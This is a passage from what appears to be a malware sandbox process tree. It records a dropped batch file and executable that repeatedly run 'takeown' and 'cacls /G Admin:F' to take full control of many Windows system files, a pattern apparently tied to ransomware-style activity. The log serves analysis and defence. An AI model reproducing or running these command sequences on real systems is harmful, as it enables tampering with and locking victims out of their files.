  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:1344
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3560
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml""
  2⤵
  PID:2580
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml" /E /G Admin:F /C
    3⤵
    PID:3560
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner
    3⤵
    PID:3380
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:3616
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3656
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml""
  2⤵
  PID:624
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml" /E /G Admin:F /C
    3⤵
    PID:680
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2580
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "RoamingCredentialSettings.xml" -nobanner
    3⤵
    PID:3012
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "RoamingCredentialSettings.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:3804
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1272
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e_COM15.dat.LOG1""
  2⤵
  PID:680
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e_COM15.dat.LOG1" /E /G Admin:F /C
    3⤵
    PID:3616
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e_COM15.dat.LOG1"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:624
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "75fbd12bafcbd46e_COM15.dat.LOG1" -nobanner
    3⤵
    PID:1908
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "75fbd12bafcbd46e_COM15.dat.LOG1" -nobanner
      4⤵
      Executes dropped EXE
      PID:4072
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3360
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl""
  2⤵
  PID:3552
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl" /E /G Admin:F /C
    3⤵
    PID:1272
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl" -nobanner
    3⤵
    PID:2400
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl" -nobanner
      4⤵
      Executes dropped EXE
      PID:3656
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1272
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl""
  2⤵
  PID:680
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl" /E /G Admin:F /C
    3⤵
    PID:920
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl" -nobanner
    3⤵
    PID:3380
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl" -nobanner
      4⤵
      Executes dropped EXE
      PID:3804
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2712
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.a367b37d-652f-4d88-9b9d-e3a17dac8879.1.etl""
  2⤵
  PID:1908
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.a367b37d-652f-4d88-9b9d-e3a17dac8879.1.etl" /E /G Admin:F /C
    3⤵
    PID:624
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.a367b37d-652f-4d88-9b9d-e3a17dac8879.1.etl"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "UpdateSessionOrchestration.a367b37d-652f-4d88-9b9d-e3a17dac8879.1.etl" -nobanner
    3⤵
    PID:2580
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "UpdateSessionOrchestration.a367b37d-652f-4d88-9b9d-e3a17dac8879.1.etl" -nobanner
      4⤵
      Executes dropped EXE
      PID:3360
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:560
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml""
  2⤵
  PID:2700
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml" /E /G Admin:F /C
    3⤵
    PID:1344
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "AssemblyList_4_client.xml" -nobanner
    3⤵
    PID:3616
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "AssemblyList_4_client.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:2948
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1780
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
  2⤵
  PID:1344
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
    3⤵
    PID:624
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2580
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "overlay.png" -nobanner
    3⤵
    PID:2684
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "overlay.png" -nobanner
      4⤵
      PID:2712
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3552
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  2⤵
  PID:624
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
    3⤵
    PID:1780
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "superbar.png" -nobanner
    3⤵
    PID:2104
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "superbar.png" -nobanner
      4⤵
      PID:3560
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2400
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""
  2⤵
  PID:920
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2104
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:3360
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:3012
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2880
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml""
  2⤵
  PID:560
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml" /E /G Admin:F /C
    3⤵
    PID:3656
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner
    3⤵
    PID:3380
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner
      4⤵
      PID:1780
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2580
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml""
  2⤵
  PID:1048
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml" /E /G Admin:F /C
    3⤵
    PID:3616
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner
    3⤵
    PID:3380
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner
      4⤵
      PID:2580
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2104
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml""
  2⤵
  PID:4072
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml" /E /G Admin:F /C
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2580
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner
    3⤵
    PID:1476
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner
      4⤵
      PID:2104
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2712
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""
  2⤵
  PID:2844
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C
    3⤵
    PID:920
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
    3⤵
    PID:3168
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
      4⤵
      PID:2400
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3616
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""
  2⤵
  PID:920
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2104
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1476
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:2400
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:2844
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1908
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm""
  2⤵
  PID:4112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm" /E /G Admin:F /C
    3⤵
    PID:4168
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm"
    3⤵
    PID:4188
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "qmgr.jfm" -nobanner
    3⤵
    PID:4208
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "qmgr.jfm" -nobanner
      4⤵
      PID:4232
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4256
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml""
  2⤵
  PID:4272
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml" /E /G Admin:F /C
    3⤵
    PID:4340
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "EaseOfAccessSettings2013.xml" -nobanner
    3⤵
    PID:4376
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "EaseOfAccessSettings2013.xml" -nobanner
      4⤵
      PID:4392
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4424
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml""
  2⤵
  PID:4440
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml" /E /G Admin:F /C
    3⤵
    PID:4484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml"
    3⤵
    - Modifies file permissions
    PID:4500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftOffice2013BackupWin64.xml" -nobanner
    3⤵
    PID:4516
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftOffice2013BackupWin64.xml" -nobanner
      4⤵
      PID:4528
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4544
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml""
  2⤵
  PID:4560
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml" /E /G Admin:F /C
    3⤵
    PID:4608
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml"
    3⤵
    PID:4624
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftOutlook2013CAWin64.xml" -nobanner
    3⤵
    PID:4640
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftOutlook2013CAWin64.xml" -nobanner
      4⤵
      PID:4656
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4672
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""
  2⤵
  PID:4688
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C
    3⤵
    PID:4748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"
    3⤵
    PID:4764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner
    3⤵
    PID:4780
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner
      4⤵
      PID:4796
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4812
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""
  2⤵
  PID:4828
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4904
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"
    3⤵
    PID:4920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:4936
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4948
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4968
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl""
  2⤵
  PID:4992
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl" /E /G Admin:F /C
    3⤵
    PID:5068
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl"
    3⤵
    PID:5084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl" -nobanner
    3⤵
    PID:5100
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl" -nobanner
      4⤵
      PID:5116
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4128
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl""
  2⤵
  PID:276
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl" /E /G Admin:F /C
    3⤵
    PID:3596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl"
    3⤵
    PID:4188
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl" -nobanner
    3⤵
    PID:4240
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
